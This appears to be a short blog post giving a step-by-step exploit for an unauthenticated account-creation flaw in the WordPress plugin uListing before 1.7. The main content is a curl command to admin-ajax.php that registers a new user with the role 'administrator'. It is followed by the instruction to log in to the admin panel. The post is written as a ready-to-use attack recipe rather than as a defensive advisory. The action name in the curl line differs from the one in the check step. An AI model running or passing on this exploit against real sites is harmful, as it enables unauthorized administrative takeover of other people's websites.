Just a blog

Wordpress Plugin uListing < 1.7 - Unauthenticated Account Creation

Wordpress Plugin uListing < 1.7 - Unauthenticated Account Creation

Adonis's photo
Adonis
·

1 min read

Reference : Nintechnet

  1. Check if redacted vuln by accessing
    http://redacted.com/wp-admin/admin-ajax.php?action=stm_listing_register

image.png Note: Not all vuln.

  1. Make Json request to redacted
    curl "https://redacted.com/wp-admin/admin-ajax.php?action=s_listing_register" -d '{"email": "Your Email","first_name":"Rinto","last_name": "ARRRR", "login": "YOUR USERNAME", "password": "YOUR PASSWORD", "password_repeat":"YOUR PASSWORD","role":"administrator"}' -v

image.png

  1. Login to admin panel.
hackingwordpress plugins